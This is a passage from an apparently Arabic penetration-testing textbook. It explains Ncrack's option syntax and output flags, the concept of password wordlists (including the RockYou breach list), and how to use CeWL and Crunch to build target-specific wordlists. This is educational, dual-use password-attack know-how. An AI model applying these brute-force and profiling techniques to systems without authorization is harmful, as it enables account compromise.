‫ﺑﺻرف اﻟﻧظر ﻋن ﺗﺣدﯾد اﻟﺧدﻣﺎت اﻟﻌﺎﻣﺔ‪ Ncrack ،‬ﯾﺳﻣﺢ ﻟك ﺑﺗوﻓﯾر اﻟﻌدﯾد ﻣن اﻟﺧﯾﺎرات اﻟﺗﻲ ﯾﻣﻛن ﺗطﺑﯾﻘﮭﺎ ﻋﻠﻰ اﻟﻛل أو ﻣﺟﻣوﻋﺔ ﻓرﻋﯾﺔ‬
‫ﻣن اﻷھداف اﻟﺧﺎﺻﺔ ﺑك‪ .‬ﺗﺷﻣل اﻟﺧﯾﺎرات اﻟﺗوﻗﯾت واﻷداء‪ SSL ،‬ﺗﻣﻛﯾن ‪ /‬ﺗﻌطﯾل‪ ،‬وﻏﯾرھﺎ ﻣن ﻣﻌﺎﻣﻼت اﻟوﺣدة اﻟﻣﺣددة‬
‫)‪ (module-specific parameters‬ﻣﺛل ﻣﺳﺎر ‪ URL‬اﻟﻧﺳﺑﻲ ﻟﻠوﺣدة ‪ .HTTP‬ﯾﻣﻛن ﺗﻌرﯾف اﻟﺧﯾﺎرات ﻓﻲ ﻣﺟﻣوﻋﺔ ﻣﺗﻧوﻋﺔ ﻣن اﻟطرق‬
‫اﻟﺗﻲ ﺗﺷﻣل‪:‬‬
‫‪Per-host options, per-module options and global options‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪374‬‬

‫وﯾﻣﻛن اﺳﺗﺧدام ﻣزﯾﺞ ﻣن ھذه اﻟﺧﯾﺎرات‪.‬‬


‫‪Per-host options -1‬‬
‫ﺗﺷﻣل اﻟﺧﯾﺎرات اﻟﺗﻲ ﯾﺗم ﺗطﺑﯾﻘﮭﺎ ﻋﻠﻰ اﻟﻣﺿﯾف ﻓﻘط واﻟﺗﻲ ﺗﻛﺗب ﺑﺟواره‪ .‬اﻟﺻﯾﻐﺔ اﻟﻌﺎﻣﺔ ﻛﺎﻻﺗﻰ‪:‬‬
‫‪< [service-name]> ://< target> :< [port-number]>, <opt1>=<optval1>, <opt2>=<optval2>,...‬‬
‫‪per-module options -2‬‬
‫ﺗﺷﻣل اﻟﺧﯾﺎرات اﻟﺗﻲ ﯾﺗم ﺗطﺑﯾﻘﮭﺎ ﻋﻠﻰ ﺟﻣﯾﻊ اﻟﻣﺿﯾف اﻟﻣرطﺑﯾﺗﯾن ﻓﻘط ﺑوﺣدة او ﺧدﻣﮫ ﻣﻌﯾﻧﮫ وﯾﺗم ھذا ﺑﺎﺳﺗﺧدام )‪ .(-m‬اﻟﺻﯾﻐﺔ اﻟﻌﺎﻣﺔ ﻛﺎﻻﺗﻰ‪:‬‬
‫‪-m <service-name> :< opt1>=<optval1>, <opt2>=<optval2>,...‬‬
‫‪global options -3‬‬
‫ﺗﺷﻣل اﻟﺧﯾﺎرات اﻟﺗﻲ ﯾﺗم ﺗطﺑﯾﻘﮭﺎ ﻋﻠﻰ ﺟﻣﯾﻊ اﻟﻣﺿﯾف ﺑﻐض اﻟﻧظر ﻋن اﻟﺧدﻣﺔ اﻟﻣرﺗﺑط ﺑﮭﺎ‪ .‬اﻟﺻﯾﻐﺔ اﻟﻌﺎﻣﺔ ﻛﺎﻻﺗﻰ‪:‬‬
‫‪-g <opt1>=<optval1>, <opt2>=<optval2>,...‬‬
‫ﻓﯾﻣﺎ ﯾﻠﻲ ﻗﺎﺋﻣﮫ ﺑﺎﻟﺧﯾﺎرات اﻟﻣﺗﺎﺣﺔ ﻟﻠﺧدﻣﺎت ﻛﺎﻻﺗﻰ‪:‬‬

‫‪Output‬‬
‫ﺣﯾث ﻣن ﺧﻼﻟﮭﺎ ﯾﻣﻛن ﺗﺣدﯾد ﻛﯾﻔﯾﺔ اﺧراج وﺗﺧزﯾن ﻧﺎﺗﺞ اﻻﻣر ‪ Ncrack‬وﻓﯾﻣﺎ ﯾﻠﻲ ﺑﻌض اﻟﺻﯾﻎ اﻟﻌﺎﻣﺔ واﻟﺗﻲ ﺗوﺿﺢ طرﯾﻘﺔ ﺣﻔظ ﻧﺎﺗﺞ اﻻﻣر‪.‬‬
‫)‪-oN <filespec> (normal output‬‬
‫)‪-oX <filespec> (XML output‬‬
‫)‪-oA <basename> (Output to all formats‬‬
‫ﯾﻣﻛن اﻻطﻼع ﻋﻠﻰ اﻟﻛﺛﯾر ﻣن اﻟﻣﻌﻠوﻣﺎت ﻋن ھذه اﻷداة ﻣن ﺧﻼل زﯾﺎرة اﻟﻣوﻗﻊ اﻟﺗﺎﻟﻲ‪:‬‬
‫‪http://nmap.org/ncrack/man.html‬‬
‫ﯾﻣﻛن أﯾﺿﺎ اﻻطﻼع ﻋﻠﻰ اﻟﻛﺛﯾر ﻣن اﻟﻣﻌﻠوﻣﺎت ﺣول ﻛﯾﻔﯾﺔ اﻧﺷﺎء‪/‬إﺿﺎﻓﺔ ﺑروﺗوﻛوﻻت ووﺣدات ﻏﯾر اﻟﻣدرﺟﺔ ﻓﻲ ھذه اﻷداة ﻣن ﺧﻼل زﯾﺎرة‬
‫اﻟﻣوﻗﻊ اﻟﺗﺎﻟﻲ )ھذا ﺧﺎص ﺑﺎﻟﻣطورﯾن(‪:‬‬
‫‪http://nmap.org/ncrack/devguide.html‬‬

‫)‪Password Profiling (Word list or Dictionary file‬‬

‫واﺣدة ﻣن اﻟﻣﺗطﻠﺑﺎت اﻟﻣذﻛورة أﻋﻼه ھﻲ ﻗﺎﺋﻣﺔ اﻟﻘﺎﻣوس)‪ (Dictionary list‬واﻟﺗﻲ ﯾطﻠﻖ ﻋﻠﯾﮭﺎ ﻋدة أﺳﻣﺎء أﺧرى ﻣﺛل ‪ World List‬او‬
‫‪ ،Password Profiling‬وﻟﻛن ﻓﻲ اﻟﻧﮭﺎﯾﺔ ﺗﺷﯾر ﺟﻣﯾﻌﮭﺎ اﻟﻰ ﻣﻌﻧﻰ واﺣد وھو ﻋﻣﻠﯾﺔ ﺑﻧﺎء ﻗﺎﺋﻣﺔ ﻟﻛﻠﻣﺎت اﻟﻣرور اﻟﻣﺧﺻﺻﺔ اﻟﺗﻲ ﺗم ﺗﺻﻣﯾﻣﮭﺎ‬
‫ﻟﺗﺧﻣﯾن ﻛﻠﻣﺎت اﻟﺳر ﻟﻛﯾﺎن ﻣﺣدد او ﺑﻣﻌﻧﻰ اﺧر ھو اﻟﻣﻠف اﻟذي ﯾﺣﺗوي ﻋﻠﻰ ﻗﺎﺋﻣﺔ ﻣن ﻛﻠﻣﺎت اﻟﺳر اﻟﻣﺣﺗﻣﻠﺔ‪ .‬وﻏﺎﻟﺑﺎ ﻣﺎ ﯾﺷﺎر إﻟﯾﮭﺎ ﺑﺎﺳم ھذه‬
‫اﻟﻘواﺋم اﻟﻘواﻣﯾس ﻷﻧﮭﺎ ﺗﺣﺗوي ﻋﻠﻰ اﻵﻻف أو ﺣﺗﻰ اﻟﻣﻼﯾﯾن ﻣن اﻟﻛﻠﻣﺎت اﻟﻔردﯾﺔ‪.‬‬
‫ﻣﻌظم اﻟﻧﺎس ﻏﺎﻟﺑﺎ ﻣﺎ ﺗﺳﺗﺧدم اﻟﻛﻠﻣﺎت اﻻﻧﺟﻠﯾزﯾﺔ اﻟﻌﺎدﯾﺔ أو ﻣﻊ ﺑﻌض اﻻﺧﺗﻼف اﻟﺻﻐﯾرة ﻣﺛل ‪ 1‬ﻋﻠﻰ اﻧﮫ ﺣرف ‪ i‬أو ‪ 5‬ﻋﻠﻰ اﻧﮫ ﺣرف‪ s‬او ﻗد‬
‫ﯾﺳﺗﺧدﻣوا ﺑﻌض اﻟﻛﻠﻣﺎت اﻟﻣﻌﺑرة ﻋن ﺣﯾﺎﺗﮭم اﻟﺷﺧﺻﯾﺔ ﻋﻧدﻣﺎ ﯾﻘوﻣوا ﺑﺈﻧﺷﺎء ﻛﻠﻣﺎت اﻟﻣرور‪ .‬ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل‪ ،‬إذا ﻛﺎن ‪ Bob‬ﯾﺣب ﻛﻠﺑﮫ‬
‫‪ Barfy‬أﻛﺛر ﻣن أي ﺷﻲء ﻓﻲ اﻟﻌﺎﻟم‪ ،‬وﻧﺗﯾﺟﺔ ﻟذﻟك ﻓﺄﻧﻰ ﻣﺗﺄﻛد ان ﻛﻠﻣﺔ اﻟﻣرور ﺳوف ﺗﻛون اﻣﺎ ‪ Barfy‬او ‪ dog‬او ﻏﯾرھﺎ ﻣن اﻟﻛﻠﻣﺎت ذات‬
‫اﻟﺻﻠﺔ ﺑﺎﻟﻛﻼب ذات اﻟﺻﻠﺔ واﻟﺗﻲ ﺳوف ﺗﻛون ﻣوﺟودة ﻓﻲ ﻗﺎﺋﻣﺔ ﻛﻠﻣﺔ اﻟﻣرور اﻟﺧﺎﺻﺔ ﺑﻲ‪ .‬ﻗواﺋم ﻛﻠﻣﺔ اﻟﺳر ھﻲ ﻣﺣﺎوﻟﺔ ﻟﺟﻣﻊ أﻛﺑر ﻋدد‬
‫ﻣﻣﻛن ﻣن ھذه اﻟﻛﻠﻣﺎت اﻟﻣﻣﻛﻧﺔ‪ .‬ﺑﻌض اﻟﻣﺗﺳﻠﻠﯾن وﻣﺧﺗﺑري اﻻﺧﺗراق ﯾﻘﺿون ﺳﻧوات ﻟﺑﻧﺎء ﻗواﻣﯾس ﻛﻠﻣﺔ اﻟﻣرور اﻟﺗﻲ ﻗد ﺗﺻل ﺣﺟﻣﮭﺎ إﻟﻰ‬
‫ﺟﯾﺟﺎ ﺑﺎﯾت وﯾﺣﺗوي ﻋﻠﻰ اﻟﻣﻼﯾﯾن أو ﺣﺗﻰ اﻟﻣﻠﯾﺎرات ﻣن ﻛﻠﻣﺎت اﻟﺳر‪ .‬اﻟﻘﺎﻣوس اﻟﺟﯾد ﯾﻣﻛن أن ﯾﻛون ﻣﻔﯾد ﻟﻠﻐﺎﯾﺔ وﻟﻛن ﻏﺎﻟﺑﺎ ﻣﺎ ﯾﺗطﻠب اﻟﻛﺛﯾر‬
‫ﻣن اﻟوﻗت واﻻھﺗﻣﺎم ﻟﻠﺣﻔﺎظ ﻋﻠﻰ ﻧظﺎﻓﺔ‪ .‬اﻟﻘواﻣﯾس ﻧظﯾﻔﺔ وﻣﺑﺳطﺔ وﺧﺎﻟﯾﺔ ﻣن اﻻزدواﺟﯾﺔ‪.‬‬
‫ﻣﻌظم ﺑراﻣﺞ ﺗﻛﺳﯾر ﻛﻠﻣﺎت اﻟﻣرور ﯾﻣﻛﻧﮭم اﺳﺗﺧدام ﻣﻠف ﻛﻠﻣﺔ اﻟﻣرور ﻣﺑﺎﺷرة ﻷﻧﮭﺎ ﻣوﺟودة‪ ،‬ﻓﻲ ﺣﯾن أن أﻛﺛر اﻟدول اﻟﻣﺗﻘدﻣﺔ ﯾﻣﻛن اﺳﺗﺧدام‬
‫ﻣﻠف ﻛﻠﻣﺔ اﻟﺳر )أو ﻣﻠﻔﺎت ﻣﺗﻌددة( واﻟﺗﻼﻋب ﺑﮭﺎ ﻟﻣﺣﺎوﻟﺔ ﺧﻠﻖ اﻟﻌدﯾد ﻣن اﻟﺗرﻛﯾﺑﺎت اﻟﺟدﯾدة ﻣن ﻛﻠﻣﺎت اﻟﺳر‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪375‬‬

‫ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل‪ ،‬ﯾﻣﻛن ﻟﺑﻌض اﻟﺗطﺑﯾﻘﺎت اﺗﺧﺎذ ﺟﻣﯾﻊ ﻛﻠﻣﺎت اﻟﺳر اﻟﻣوﺟود ﻓﻲ ﻗﺎﺋﻣﺔ اﻟﻛﻠﻣﺎت وإرﻓﺎق ﺑﻌض اﻷﺣرف أو اﻷرﻗﺎم إﻟﻰ ﺑداﯾﺔ أو‬
‫ﻧﮭﺎﯾﺔ اﻟﻛﻠﻣﺔ‪ .‬وﺑﻌض اﻟﺑراﻣﺞ اﻷﺧرى ﺗﺗﻌﺎﻣل ﻣﻊ اﺛﻧﯾن أو أﻛﺛر ﻣن اﻟﻣﻠﻔﺎت ﻗﺎﺋﻣﺔ اﻟﻛﻠﻣﺎت ﻓﻲ أﻧن واﺣد واﻟﺟﻣﻊ ﺑﯾن اﻟﻛﻠﻣﺎت ﻟﻣﺣﺎوﻟﺔ ﺗﻘدﯾم‬
‫ﻗﺎﺋﻣﺔ ﺟدﯾدة ﻣن اﻟﻛﻠﻣﺎت‪.‬‬
‫اﺳﺗﺧدام ﻗﺎﺋﻣﺔ اﻟﻛﻠﻣﺎت ﯾﺟﻌل ﻣن ﻋﻣﻠﯾﺔ ﺗﻛﺳﯾر ﻛﻠﻣﺎت اﻟﻣرور ﻋﻣﻠﯾﮫ ﺳﮭﻠﮫ وﺳرﯾﻌﺔ‪ .‬ﻓﺈن اﻟﻌدﯾد ﻣن ﻣﺧﺗﺑري اﻻﺧﺗراق ﯾﻘوﻣوا ﺑﺈﻧﺷﺎء اﻟﻌدﯾد‬
‫ﻣن ﻗواﺋم ﻛﻠﻣﺎت اﻟﻣرور اﻟﺧﺎﺻﺔ ﺑﮭم ﺑﺎﺳﺗﺧدام ﺑﯾﺎﻧﺎت اﻟﺷرﻛﺔ‪ ،‬وأﺳﻣﺎء اﻟﻣوظﻔﯾن وأرﻗﺎم اﻟﮭﺎﺗف وﻋﻧﺎوﯾن اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ‪ ،‬إﻟﺦ‪.‬‬

‫ھﻧﺎك اﻟﻛﺛﯾر ﻣن ﻗواﺋم اﻟﻛﻠﻣﺎت اﻟﺻﻐﯾرة اﻟﺗﻲ ﯾﻣﻛن ﺗﺣﻣﯾﻠﮭﺎ ﻣن ﻋﻠﻰ اﻹﻧﺗرﻧت وﺗﻛون ﺑﻣﺛﺎﺑﺔ ﻧﻘطﺔ اﻧطﻼق ﺟﯾدة ﻟﺑﻧﺎء ﻗﺎﻣوس ﻛﻠﻣﺔ اﻟﺳر‬
‫اﻟﺷﺧﺻﯾﺔ اﻟﺧﺎﺻﺔ ﺑك‪ .‬وھﻧﺎك أﯾﺿﺎ اﻷدوات اﻟﻣﺗﺎﺣﺔ اﻟﺗﻲ ﻣن ﺷﺄﻧﮭﺎ ﺑﻧﺎء ﻗواﺋم اﻟﻘواﻣﯾس ﺑﺎﻟﻧﺳﺑﺔ ﻟك‪ .‬وﻟﻛن‪ ،‬ﻟﺣﺳن اﻟﺣظ‪ ،‬ﻓﺎن ﻧظﺎم اﻟﺗﺷﻐﯾل‬
‫ﻛﺎﻟﻲ ﺑﺎﻟﻔﻌل ﯾﺣﺗوي ﻋﻠﻰ ﻋدد ﻗﻠﯾل ﻣن ﻗواﺋم اﻟﻛﻠﻣﺎت ﺑﺎﻟﻧﺳﺑﺔ ﻟﻧﺎ ﻻﺳﺗﺧداﻣﮭﺎ‪ .‬ﯾﻣﻛﻧك اﻟﻌﺛور ﻋﻠﻰ ھذه ﻓﻲ اﻟﻣﺳﺎر ]‪[/usr/share/wordlists‬‬
‫اﻟذي ﯾﺣﺗوي ﻋﻠﻰ واﺣد ﻣن أﻋﺗﻰ ﻗواﺋم اﻟﻛﻠﻣﺎت واﻟذي ﯾﺳﻣﻰ "‪) "RockYou‬ﻣﺄﺧوذ ﻣن ﺧرق اﻟﺑﯾﺎﻧﺎت اﻟﻛﺑﯾرة ﻟﻠﻐﺎﯾﺔ(‪.‬‬

‫ھﻧﺎك أﯾﺿﺎ ﻗﺎﺋﻣﺔ ﻛﻠﻣﺎت ﺻﻐﯾرة وﻟﻛﻧﮭﺎ ﻣﻔﯾدة ﺟدا ﻣﺗﺿﻣﻧﮫ ﻣﻊ )‪ (JtR‬واﻟﺗﻲ ﺗﻘﻊ ﻓﻲ اﻟﻣﺳﺎر ]‪.[/usr/share/john/password.lst‬‬
‫ھﻧﺎك ﻗواﺋم أﺧرى واﻟﺗﻲ ﺗﺳﻣﻰ ‪ WFUZZ Multiple Wordlists‬واﻟﺗﻲ ﺗوﺟد ﻓﻲ اﻟﻣﺳﺎر ‪./usr/share/wfuzz/‬‬

‫ﻋﻧدﻣﺎ ﯾﺗﻌﻠﻖ اﻷﻣر ﺑﻘواﺋم ﻛﻠﻣﺎت اﻟﻣرور‪ ،‬ﻓﺎن اﻷﻛﺑر ﻣﻧﮭﺎ ﻟﯾس داﺋﻣﺎ اﻷﻓﺿل‪ .‬أدوات ﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور ﻓﻲ اﻟوﺿﻊ ‪ Offline‬ﻣﺛل ‪JtR‬‬
‫ﺗﻌﺎﻟﺞ اﻟﻣﻼﯾﯾن ﻣن ﻛﻠﻣﺎت اﻟﺳر ﻓﻲ اﻟﺛﺎﻧﯾﺔ اﻟواﺣدة‪ .‬ﻓﻲ ھذه اﻟﺣﺎﻻت‪ ،‬ﻓﺎن ﻛﻠﻣﺎ ﻛﺎﻧت ﻗواﺋم ﻛﻠﻣﺎت اﻟﺳر أﻛﺑر ﻛﻠﻣﺎ ﻛﺎن ﺟﯾدا‪ .‬وﻣﻊ ذﻟك‪ ،‬ﻓﺎن‬
‫ﺗﻘﻧﯾﺎت ﺗﻛﺳﯾر ﻛﻠﻣﺎت اﻟﻣرور أﺧرى ﻣﺛل اﻟﻣﯾدوﺳﺎ واﻟﮭﯾدرا ﻗد ﺗﻛون ﻗﺎدرة ﻋﻠﻰ ﻣﻌﺎﻟﺟﺔ واﺣد أو اﺛﻧﯾن ﻣن ﻛﻠﻣﺎت اﻟﺳر ﻓﻲ اﻟﺛﺎﻧﯾﺔ اﻟواﺣدة ﻓﻘط‪.‬‬
‫ﻓﻲ ھذه اﻟﺣﺎﻻت‪ ،‬ﻓﺎن وﺟود ﻗﺎﺋﻣﺔ واﺣدة ﻣﻊ اﻟﻣﻠﯾﺎرات ﻣن ﻛﻠﻣﺎت اﻟﻣرور ﻏﯾر ﻋﻣﻠﻲ ﻷﻧك ﺑﺑﺳﺎطﺔ ﻟن ﯾﻛون ﻟدﯾك اﻟوﻗت ﻟﻠﺣﺻول ﻋﻠﻰ‬
‫ﻛﻠﻣﺎت اﻟﻣرور ﻣن ﺧﻼل اﻟﻘﺎﺋﻣﺔ ﺑﺄﻛﻣﻠﮭﺎ‪ .‬ﻓﻲ ﻣﺛل ھذه اﻟﺣﺎﻻت‪ ،‬ﻓﺎﻧﮫ ﻣن اﻷﻓﺿل اﺳﺗﺧدام ﻗﺎﻣوس أﺻﻐر‪ ،‬واﻟذي ﯾﺣﺗوي ﻋﻠﻰ ﻛﻠﻣﺎت اﻟﻣرور‬
‫اﻷﻛﺛر ﺷﻌﺑﯾﺔ‪.‬‬
‫ﻓﻲ ﻧظﺎم اﻟﺗﺷﻐﯾل ﻛﺎﻟﻲ ﯾﺗوﻓر اﻟﻌدﯾد ﻣن اﻷدوات واﻟﺗﻲ ﺗﻣﻛﻧك ﻣن إﻧﺷﺎء ‪ wordlists‬ﺷﺧﺻﯾﺔ ﺧﺎﺻﺔ ﺑك‪ .‬ﻣن ھذه اﻻدوات ‪ CeWL‬ھو‬
‫أﻧﯾﻖ ﺟدا ﻷﻧﮫ ﯾﺗﯾﺢ ﻟك إﻧﺷﺎء ﻛﻠﻣﺎت اﻟﻣرور ﻋن طرﯾﻖ اﻻﺳﺗﯾﻼء ﻋﻠﻰ ﻣﻌﻠوﻣﺎت ﻣن ﻣوﻗﻊ اﻟﮭدف‪ Crunch .‬ھو اداه ﻟطﯾﻔﮫ ﺟدا ﺗﺳﻣﺢ ﻟك‬
‫ﻟﺧﻠﻖ ‪ wordlists‬اﻟﻣﺧﺻﺻﺔ اﻟﺧﺎﺻﺔ ﺑك ﻣن اﻟﺻﻔر‪.‬‬

‫)‪CeWL (Password Profiling‬‬


‫‪ CeWL‬ھو ﺗطﺑﯾﻖ ﻗﺎﺋم ﻋﻠﻰ ﻟﻐﺔ اﻟﺑرﻣﺟﺔ ‪ Ruby‬واﻟﺗﻲ ﺗﻘوم ﺑﺎﻟﻧظر اﻟﻰ ﻋﻧﺎوﯾن ‪ URL‬ﺑﻌﻣﻖ ﻣﺛل ﻣﺎ ﺗﻘوم ﺑﮫ ﻣواﻗﻊ اﻟﺑﺣث‪ ،‬وﯾﻣﻛﻧﮭﺎ أﯾﺿﺎ‬
‫ﺗﺗﺑﻊ اﻟﻌﻧﺎوﯾن اﻟﺧﺎرﺟﯾﺔ اﻟﻣرﺗﺑطﺔ ﺑﺎﻟﻣوﻗﻊ اﻟﮭدف اﺧﺗﯾﺎرﯾﺎ أي ﻋﻠﻰ ﺣﺳب اﻟرﻏﺑﺔ‪ ،‬ﺛم ﺑﻌد ذﻟك ﯾﻘوم ﺑﺈرﺟﺎع ﻗﺎﺋﻣﺔ ﻣن اﻟﻛﻠﻣﺎت اﻟﺗﻲ ﯾﻣﻛن‬
‫اﺳﺗﺧداﻣﮭﺎ ﻣن ﻗﺑل اﻟﺗطﺑﯾﻘﺎت اﻷﺧرى ﻓﻲ ﻛﺳر ﻛﻠﻣﺔ اﻟﺳر ﻣﺛل ‪ .JtR‬ﻟﻣزﯾد ﻣن اﻟﻣﻌﻠوﻣﺎت ﺣول ‪ ،CeWL‬ﯾﻣﻛن زﯾﺎرة اﻟراﺑط اﻟﺗﺎﻟﻲ‪:‬‬

‫‪http://www.digininja.org/projects/cewl.php‬‬

‫دﻋﻧﺎ ﻧﻧظر أوﻻ إﻟﻰ ﻣﻌﻠوﻣﺎت اﻻﺳﺗﺧدام اﻟﺗﻲ ﺗﻘدﻣﮭﺎ ‪ ،CeWL‬وﺑﻌد ذﻟك ﺳوف ﻧظﮭر ﻟك ﻛﯾﻔﯾﺔ اﺳﺗﺧداﻣﮫ‪ .‬وﯾﺗم ذﻟك ﻋن طرﯾﻖ اﺗﺑﺎع اﻻﺗﻲ‪:‬‬

‫‪Applications | Kali Linux | Password Attacks | Online Attacks | CeWL‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪376‬‬

‫اﻓﺗراﺿﯾﺎ‪ CeWL ،‬ﺗﻘوم ﺑﺟﻣﻊ اﻟﻛﻠﻣﺎت ذات ‪ 3‬أﺣرف أو أﻛﺛر ﻣن ﺧﻼل اﻟﻣوﻗﻊ اﻟذي ﺣددﺗﮫ وﺳوف ﺗذھب إﻟﻰ ﻋﻣﻖ ﻣﺳﺗوﯾن ﻣن اﻟوﺻﻼت‬
‫اﻟﺧﺎرﺟﯾﺔ ﺑﺎﺳﺗﺧدام أﺳﻠوب اﻟﻌﻧﻛﺑوت )ﻣﺛل اﻟذي ﺗﺳﺗﺧدﻣﮫ ﻣواﻗﻊ اﻟﺑﺣث ﻣﺛل ﺟوﺟل ﻓﻲ ﻋﻣﻠﯾﺎت اﻟﺑﺣث(‪ ،‬وﯾﻣﻛن ﺗﻐﯾﯾر ھذا اﻟﺳﻠوك ﻋن طرﯾﻖ‬
‫ﺗﻣرﯾر اﻟﻣﻌﺎﻣﻼت‪ .‬ﻛن ﺣذرا ﻋﻧد ﺗﻐﯾر ھده اﻟﻣﻌﺎﻣﻼت ﺣﯾث إذا وﺿﻌﺗﮭم اﻟﻰ ﻋﻣﻖ ﻛﺑﯾر واﻟﺳﻣﺎح ﻟﮫ ﺑﺎﻟذھﺎب ﺑﻌﯾدا‪ ،‬ﻓﻘد ﯾﻧﺗﮭﻲ ﺑك اﻟﻣطﺎف اﻟﻰ‬
‫اﻻﻧﺟراف إﻟﻰ اﻟﻛﺛﯾر ﻣن اﻟﻣﺟﺎﻻت اﻷﺧرى‪ .‬ﺟﻣﯾﻊ اﻟﻛﻠﻣﺎت ذات اﻟﺛﻼﺛﺔ أﺣرف وأﻛﺛر ﺗﻛون ﻧﺎﺗﺞ اﻹﺧراج‪ .‬ﯾﻣﻛن زﯾﺎدة طول اﻟﻛﻠﻣﺔ وﯾﻣﻛن‬
‫أﯾﺿﺎ ﻛﺗﺎﺑﺔ اﻟﻛﻠﻣﺎت إﻟﻰ ﻣﻠف ﺑدﻻ ﻣن اﻟﺷﺎﺷﺔ‪.‬‬
‫‪#cewl [OPTION] ... URL‬‬
‫‪#cewl -w passwords.txt http://www.digininja.org/projects/cewl.php‬‬

‫‪Crunch‬‬
‫‪ Crunch‬ھﻲ أداة ﻗوﯾﮫ ﺗﺳﺗﺧدم ﻹﻧﺷﺎء ﻗواﺋم اﻟﻛﻠﻣﺎت اﻟﺧﺎﺻﺔ ﺑك واﻟﺗﻲ ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻣﻊ ﺗطﺑﯾﻘﺎت ﺗﻛﺳﯾر ﻛﻠﻣﺎت اﻟﻣرور‪.‬‬
‫ﻟﻠوﺻول اﻟﻰ ﺻﻔﺣﺎت اﻟﻣﺳﺎﻋدة اﻟﺧﺎﺻﺔ ب ‪ ،Crunch‬وذﻟك ﻋن طرﯾﻖ اﺳﺗﺧدام اﻷﻣر اﻟﺗﺎﻟﻲ‪:‬‬
‫‪#man crunch‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪377‬‬

‫ﻓﻲ اﻷﺳﺎس ﻛل ﻣﺎ ﻧﺣﺗﺎج إﻟﯾﮫ ﻟﺗﺷﻐﯾل‪ Crunch‬ھو ﺗﺣدﯾد اﻟﺣد اﻷدﻧﻰ واﻟﺣد اﻷﻗﺻﻰ ﻟﻠطول وﻧوع اﻷﺣرف اﻟﻣﺳﺗﺧدﻣﺔ‪ .‬أﯾﺿﺎ ‪crunch‬‬
‫ﯾﻌﺗﻣد ﺑﻛﺛره ﻋﻠﻰ اﺳﺗﺧدام اﻟﻣﻠف ‪ charset.lst‬اﻟﻣوﺟود ﻓﻲ ﻣﺳﺎر اﻟﺗﺛﺑﯾت ]‪ [/etc/share/crunch‬ﺣﯾث ان ھذا اﻟﻣﻠف ﯾﺣﺗوي ﻋﻠﻰ‬
‫اﻟﻘواﻋد اﻟﺗﻲ ﺳوف ﻧﺳﺗﺧدﻣﮭﺎ ﻓﻲ ﺗوﻟﯾد اﻟﻘواﻣﯾس‪ .‬ﻟذﻟك ﺳوف ﻧﺣﺗﺎج إﻣﺎ إﻟﻰ ﺗﺷﻐﯾل ‪ crunch‬ﻣن ﺧﻼل ھذا اﻟﻣﺳﺎر أو اﻹﺷﺎرة إﻟﻰ ھذا‬
‫اﻟﻣﺳﺎر ﻣﻊ اﺳﺗﺧدام اﻟﺗﻌﺑﯾر )‪(-f‬وذﻟك ﻋﻧد اﺳﺗﺧدام ﻣﺟﻣوﻋﺎت اﻷﺣرف اﻷﻛﺛر ﺗﻘدﻣﺎ‪.‬‬

‫ﻟﻠﻘﯾﺎم ﺑﻌﻣﻠﯾﺔ ﺗوﻟﯾد اﻟﻛﻠﻣﺎت ﻧﻘوم ﺑﺎﻟﺗﻌدﯾل ﻋﻠﻰ ﻣﻠف اﻟﻘواﻋد ‪ charset.lst‬ﺑﻣﺣرر اﻟﻧﺻوص اﻟﻣﻔﺿل ﻟدﯾك ﺳوف ﺗﺟد ﺑداﺧل اﻟﻣﻠف اﻟﻌدﯾد ﻣن‬
‫اﻟﻘواﻋد اﻻﻓﺗراﺿﯾﺔ ﻣﻊ اﻟﺑرﻧﺎﻣﺞ وﺑﺟﺎﻧب ﻛل ﻗﺎﻋدة اﻟﻣﺣﺎرف اﻟﺗﻲ ﺳوف ﯾﺗﻛون ﻣﻧﮭﺎ اﻟﻘﺎﻣوس إذا اردت اﺳﺗﺧدام ﻣﺣﺎرف ﻣﻌﯾﻧﮫ ﺗﺧﺗﺎرھﺎ اﻧت‬
‫ﻋﻠﯾك ﺑﺈﻧﺷﺎء ﻗﺎﻋده ﺟدﯾده ﺧﺎﺻﺔ ﺑك ﻋن طرﯾﻖ ﻛﺗﺎﺑﺔ اﺳم اﻟﻘﺎﻋدة واﻟﻣﺣﺎرف اﻟﺗﻲ ﺗرﯾدھﺎ ان ﺗﻛون ھﻲ اﻟﻘﺎﻣوس ﻛﻣﺎ ھو ﻣوﺿﺢ ﺑﺎﻟﺻورة‬
‫اﻟﺗﺎﻟﯾﺔ‪:‬‬

‫دﻋوﻧﺎ ﻧﺑدأ ﺑﺎﺳﺗﺧدام اﻷداة ‪ crunch‬ﻣﻊ اﺑﺳط اﺳﺗﺧدام ﻟﮭﺎ ﻋن طرﯾﻖ اﻻﺗﻲ‪:‬‬

‫ﺣﯾث ﯾﻣﺛل اﻟﻘﯾﻣﺔ ‪ 1‬طول أول واﻗل ﻛﻠﻣﺔ ﻓﻲ اﻟﻘﺎﻣوس واﻟﻘﯾﻣﺔ ‪ 3‬ﺗﻣﺛل طول اﺧر ﻛﻠﻣﮫ ﻓﻲ اﻟﻘﺎﻣوس‪ .‬وﻧﺎﺗﺞ ھذا اﻻﻣر ﺳوف ﯾﻛون ﻛﻠﻣﺎت‬
‫ﻣرﻛﺑﺔ ﻣن ﺣرف إﻟﻰ ﺛﻼﺛﺔ أﺣرف ﺗﺷﺗﻣل ﻋﻠﻰ ﻛل اﻷﺣرف اﻟﻼﺗﯾﻧﯾﺔ اﻟﺻﻐﯾرة ﺷﯾﺋﺎ ﻣن ھذا اﻟﻘﺑﯾل‪:‬‬
‫…‪a, b, c, d, e, f, g, h, i, j, etc‬‬
‫…‪aa, ab, ac, ad, ae, af, ag, ah, ai, aj, etc‬‬
‫…‪aaa, aab, aac, aad, aae, aaf, aag, aah, aai, aaj, etc‬‬
